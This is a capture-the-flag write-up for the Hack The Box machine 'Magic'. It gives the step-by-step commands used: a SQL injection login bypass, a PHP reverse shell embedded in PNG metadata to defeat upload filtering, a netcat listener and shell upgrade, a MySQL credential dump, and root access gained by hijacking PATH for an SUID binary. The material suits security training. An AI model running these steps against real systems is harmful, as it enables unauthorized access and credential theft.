There are a few things you need to understand before attempting this machine, else playing this machine will be very difficult and the members in HTB will not leak any information for you, they will only “nudge” you towards the direction to solve the user and root puzzles, so without some pre-requisites nudging can be quite clueless for you.
- Simple sql injection, you need to do thing like this
' or 1=1#'.
- Know how to use burpsuite (community edition) to do web traffic interception, you will need to intercept the client response and modify it then send to the server
- suid exploit, I recommend this article if you do not know about suid exploit. You need to know how to identify it and exploit it, though the exploit examples in the article are not in Magic.
- Understand the impact of linux path misconfiguration, I strongly recommend this article, after i read the path misconfiguration section I got Magic pwned.
- Remote file inclusion, you need to upload a file to Magic which embeds reverse shell script and to bypass the file extension and header checks.
- Get an interactive terminal after you have got a shell, this makes working on your target easier, read this article which introduces method3 to upgrade netcat with magic.
- Learn how to do mysql dump after you have got username and password of a database, read this article for information.
Lastly I recommend you to read the post by g0tmi1k, this cheat sheet made by him is very valuable.
Enumeration with NMAP
nmap -sC -sV -oN magic -vvv 10.10.10.185
I have played with active and retired machines and all of them do not brute force the ssh, so do not bother the ssh service, instead focus on http web service.
Enumerate with dirb
I would recommend gobuster or dirbuster as they have threading, moreover gobuster can enumerate vhost, but using dirb is alright as well, here are the result
dirb http://10.10.10.185, this command uses the default wordlist to enumerate directories.
Later I understand amongst the directories and files found only
http://10.10.10.185/images/uploads/ is useful.
This is the main page of Magic, the function is for you to login and upload your pictures which accepts jpg, jpeg and png.
I cannot put whitespaces in the username field, but you can bypass this restriction if you have a history in your browser, or you can use a man-in-the-middle tool like burpsuite to help you modify the payload.
Set up burpsuite as follows:
Include the Magic ip address in the scope.
Include the scope in Intercept Client Requests.
Set up the proxy in firefox.
Put in arbitrary username and password and submit.
Use https://www.urlencoder.org/ to convert this string
' or 1=1#
Modify the value of username variable and forward the request.
You will see an upload picture page.
You can disable the proxy as it is not needed anymore.
Remote file inclusion
I have tested that Magic checks for header of the file and the file extension hence I could not convert a php reverse shell script extension to jpg or png format. I downloaded a valid png image file and use exiftool to embed a php reverse shell within the picture.
To install exiftool in kali linux
apt install libimage-exiftool-perl.
I tried a few php scripts but it did not work, I recommend this script by pentestmonkey which always works. I need to modify the ip address and the port number within the script before using it.
I downloaded a png image file and the script from pentestmonkey, I embed the script into the png file with this
exiftool -DocumentName="$(cat php-reverse-shell.php)" x.png then do php extension obfuscation by
mv x.png x.php.png
Upload the scripted image file:
Get the shell
On my attacker machine I will set up a netcat to listen at 4444
nc -lvnp 4444. I then run the script from the web with this path
You need to take note that as soon as you have uploaded the scripted image file you need to run it because the Magic has a cron job that periodically “cleans up” the machine.
I need to upgrade the current netcat shell with magic, first I use this
python3 -c "import pty;pty.spawn('/bin/bash')"
Then on my keyboard I do CTRL-Z to make the nc to the background, then I use
stty raw -echo, then I type
fg which makes the background nc to the foreground, then type
Get the user flag
First go to the home directory of the username I assumed which is
ls -lah, I found the directory
Go to the Magic directory and I found an interesting file
db.php5, this file contains the database username and password.
Unfortunately this password is not theseus’ linux password, also I have found that I cannot ssh with theseus.
But I can use the database credential to do mysql dump,
mysqldump -u theseus -p Magic > magic.dump
within the dump I found a password, this password can be used to change to user theseus.
Find suid enabled binary file
This is a pre-requisite for getting the root flag. First of all understand what groups does theseus belong to.
Theseus is part of the users group, hence I am going to find a file that can be executed by theseus and has suid enabled
find / -type f -perm -u=s -gid 100 2>/dev/null
There is one file that satisfies both requirement:
sysinfo gets the hardware info, cpuinfo, hard disk space and memory info.
Understanding what sysinfo is doing
strings /bin/sysinfo there are 4 commands used by
, to understand this behaviour I downloaded pspy64, this program helps to understand the processes when command is executed. To understand the processes called by sysinfo in real time.
I downloaded the pspy into my attacker machine then setup a simple http server with python
python3 -m http.server 80
On the Magic machine, I download the pspy64 into /tmp
First run pspy64 in the background
Then turn off the pspy64 use
fg then CTRL-C to terminate.
As observed from the pspy64 output I noticed the
lshw are all run by root (uid 0), this can be exploited not directly but indirectly by misconfiguring the PATH.
export PATH=.:$PATH, this is a dangerous PATH configuration which is a wildcard for all location
.. With this I can “impersonate” any programs run by sysinfo.
Privilege escalation: Get the root flag
Misconfigure the path allow me to “impersonate” any programs run by sysinfo, I can read the root by doing the bash script but name it as
#!/bin/bash reset; sh 1>&0 2>&0
sysinfo theseus becomes root.
Change to interactive mode for easier usage